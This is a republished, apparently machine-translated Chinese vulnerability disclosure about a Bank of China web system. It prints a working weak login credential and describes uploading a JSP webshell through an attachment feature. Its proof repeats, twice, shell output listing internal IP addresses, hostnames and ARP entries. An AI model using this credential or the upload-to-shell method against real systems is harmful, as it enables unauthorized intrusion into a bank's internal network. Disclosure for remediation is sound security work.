中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网)
漏洞标题 中国银行某系统存在弱口令可上传SHELL (穿透边界防火墙进入内网) 相关厂商 中国银行 漏洞作者 猪猪侠 提交时间 2016-05-01 14:44 公开时间 2016-06-18 21:…
漏洞标题
中国银行系统中的弱密码可以上传SHELL(通过边界防火墙进入内部网络)
相关制造商
中国银行
漏洞作者
猪人
提交时间
2016-05-01 14: 44
公共时间
2016-06-18 21: 00
漏洞类型
未经授权的访问/许可绕过
危险等级
高
自我评估等级
20
漏洞状态
制造商已确认
标签标签
安全意识不足,背景是猜测的
漏洞详细信息
#1发现方法
利用通用的弱密码检测脚本,它简单,高效,功能强大。
http://zone.wooyun.org/content/22529
http://zone.wooyun.org/content/21962
中文名称排名TOP500(来自全国人口数据库的数据统计)
http://zone.wooyun.org/content/18372
#2漏洞描述
https://e.boc.cn/ehome/property/frame/sign.do
找到1个弱密码:wangwei:000000
社区管理功能,添加附件,即可获得shell
漏洞证明:
https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp
[/] $/sbin/ifconfig -a
Eth0链路封装:以太网HWaddr 00: 50: 56: 9A: 72: 2C
Inet addr: 21.123.47.151 Bcast: 21.123.47.255掩码: 255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU: 1500公制: 1
RX包: 127879201错误: 0丢弃: 0溢出: 0帧: 0
TX包: 117334178错误: 0丢弃: 0溢出: 0载波: 0
碰撞: 0 txqueuelen: 1000
RX字节: 22666975632(21.1 GiB)TX字节: 32615347620(30.3 GiB)
Eth1链路封装:以太网HWaddr 00: 50: 56: 9A: 14: *
Inet addr: 10.123.47.151 Bcast: 10.123.47.255掩码: 255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU: 1500公制: 1
RX数据包: 51273711错误: 0丢弃: 0溢出: 0帧: 0
TX包: 46856648错误: 0丢弃: 0溢出: 0载波: 0
碰撞: 0 txqueuelen: 1000
RX字节: 12233542012(11.3 GiB)TX字节: 9912431273(9.2 GiB)
Lo Link encap: Local Loopback
Inet addr: 127.0.0.1掩码: 255.0.0.0
UP LOOPBACK RUNNING MTU: 65536公制: 1
RX数据包: 238664440错误: 0丢弃: 0溢出: 0帧: 0
TX包: 238664440错误: 0丢弃: 0溢出: 0载波: 0
碰撞: 0 txqueuelen: 0
RX字节: 24040429146(22.3 GiB)TX字节: 24040429146(22.3 GiB)
[/] $ cat/etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
: 1 localhost localhost.localdomain localhost6 localhost6.localdomain6
21.123.47.146P1EZECAP01
21.123.47.147P1EZECAP02
21.123.47.148P1EZECAP03
21.123.47.149P1EZECAP04
21.123.47.150P1EZECAP05
21.123.47.151P1EZECAP06
21.123.47.152P1EZECAP07
21.123.47.153P1EZECAP08
10.123.47.146P1EZECAP01_gpfs
10.123.47.147P1EZECAP02_gpfs
10.123.47.148P1EZECAP03_gpfs
10.123.47.149P1EZECAP04_gpfs
10.123.47.150P1EZECAP05_gpfs
10.123.47.151P1EZECAP06_gpfs
10.123.47.152P1EZECAP07_gpfs
10.123.47.153P1EZECAP08_gpfs
21.122.32.116 ZabbixServer
21.123.102.88 nbu3media1
21.123.102.89 nbu3media2
21.123.102.90 nbu3master
[/] $/sbin/arp -a
? (21.123.47.161)00: 50: 56: 9a: 3d: 95 [ether] on eth0
P1EZECAP05(21.123.47.150)00: 50: 56: 9a: 00: 55 [ether] on eth0
? (21.123.47.1)at 00: 00: 0c: 9f: f0: 2f [ether] on eth0
P1EZECAP01_gpfs(10.123.47.146)位于00: 50: 56: 9a: 62: 66 [ether] on eth1
P1EZECAP05_gpfs(10.123.47.150)位于00: 50: 56: 9a: 79: c7 [ether] on eth1
P1EZECAP03_gpfs(10.123.47.148)位于00: 50: 56: 9a: 31: 0c [ether] on eth1
P1EZECAP04_gpfs(10.123.47.149)位于00: 50: 56: 9a: 6f: 8f [ether] on eth1
P1EZECAP07(21.123.47.152)00: 50: 56: 9a: 49: 62 [ether] on eth0
P1EZECAP08_gpfs(10.123.47.153)位于00: 50: 56: 9a: 7b: 08 [ether] on eth1
P1EZECAP07_gpfs(10.123.47.152)位于00: 50: 56: 9a: 05: f1 [ether] on eth1
P1EZECAP02_gpfs(10.123.47.147)位于00: 50: 56: 9a: 56: 89 [ether] on eth1
[/] $
修理计划:
补偿密码,补充上传漏洞
版权声明:转载请注明出处猪猪人@乌云
漏洞证明:
https://e.boc.cn/ehome/eshop/ehome-files/eproperty/2016/05/01/Customize14*********.jsp
[/] $/sbin/ifconfig -a
Eth0链路封装:以太网HWaddr 00: 50: 56: 9A: 72: 2C
Inet addr: 21.123.47.151 Bcast: 21.123.47.255掩码: 255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU: 1500公制: 1
RX包: 127879201错误: 0丢弃: 0溢出: 0帧: 0
TX包: 117334178错误: 0丢弃: 0溢出: 0载波: 0
碰撞: 0 txqueuelen: 1000
RX字节: 22666975632(21.1 GiB)TX字节: 32615347620(30.3 GiB)
Eth1链路封装:以太网HWaddr 00: 50: 56: 9A: 14: *
Inet addr: 10.123.47.151 Bcast: 10.123.47.255掩码: 255.255.255.0
UP BROADCAST RUNNING MULTICAST MTU: 1500公制: 1
RX数据包: 51273711错误: 0丢弃: 0溢出: 0帧: 0
TX包: 46856648错误: 0丢弃: 0溢出: 0载波: 0
碰撞: 0 txqueuelen: 1000
RX字节: 12233542012(11.3 GiB)TX字节: 9912431273(9.2 GiB)
Lo Link encap: Local Loopback
Inet addr: 127.0.0.1掩码: 255.0.0.0
UP LOOPBACK RUNNING MTU: 65536公制: 1
RX数据包: 238664440错误: 0丢弃: 0溢出: 0帧: 0
TX包: 238664440错误: 0丢弃: 0溢出: 0载波: 0
碰撞: 0 txqueuelen: 0
RX字节: 24040429146(22.3 GiB)TX字节: 24040429146(22.3 GiB)
[/] $ cat/etc/hosts
127.0.0.1 localhost localhost.localdomain localhost4 localhost4.localdomain4
: 1 localhost localhost.localdomain localhost6 localhost6.localdomain6
21.123.47.146P1EZECAP01
21.123.47.147P1EZECAP02
21.123.47.148P1EZECAP03
21.123.47.149P1EZECAP04
21.123.47.150P1EZECAP05
21.123.47.151P1EZECAP06
21.123.47.152P1EZECAP07
21.123.47.153P1EZECAP08
10.123.47.146P1EZECAP01_gpfs
10.123.47.147P1EZECAP02_gpfs
10.123.47.148P1EZECAP03_gpfs
10.123.47.149P1EZECAP04_gpfs
10.123.47.150P1EZECAP05_gpfs
10.123.47.151P1EZECAP06_gpfs
10.123.47.152P1EZECAP07_gpfs
10.123.47.153P1EZECAP08_gpfs
21.122.32.116 ZabbixServer
21.123.102.88 nbu3media1
21.123.102.89 nbu3media2
21.123.102.90 nbu3master
[/] $/sbin/arp -a
? (21.123.47.161)00: 50: 56: 9a: 3d: 95 [ether] on eth0
P1EZECAP05(21.123.47.150)00: 50: 56: 9a: 00: 55 [ether] on eth0
? (21.123.47.1)at 00: 00: 0c: 9f: f0: 2f [ether] on eth0
P1EZECAP01_gpfs(10.123.47.146)位于00: 50: 56: 9a: 62: 66 [ether] on eth1
P1EZECAP05_gpfs(10.123.47.150)位于00: 50: 56: 9a: 79: c7 [ether] on eth1
P1EZECAP03_gpfs(10.123.47.148)位于00: 50: 56: 9a: 31: 0c [ether] on eth1
P1EZECAP04_gpfs(10.123.47.149)位于00: 50: 56: 9a: 6f: 8f [ether] on eth1
P1EZECAP07(21.123.47.152)00: 50: 56: 9a: 49: 62 [ether] on eth0
P1EZECAP08_gpfs(10.123.47.153)位于00: 50: 56: 9a: 7b: 08 [ether] on eth1
P1EZECAP07_gpfs(10.123.47.152)位于00: 50: 56: 9a: 05: f1 [ether] on eth1
P1EZECAP02_gpfs(10.123.47.147)位于00: 50: 56: 9a: 56: 89 [ether] on eth1
[/] $
修理计划:
补偿密码,补充上传漏洞
版权声明:转载请注明出处猪猪人@乌云
- 发表于 2016-07-17 08:00
- 阅读 ( 638 )
- 分类:黑客技术
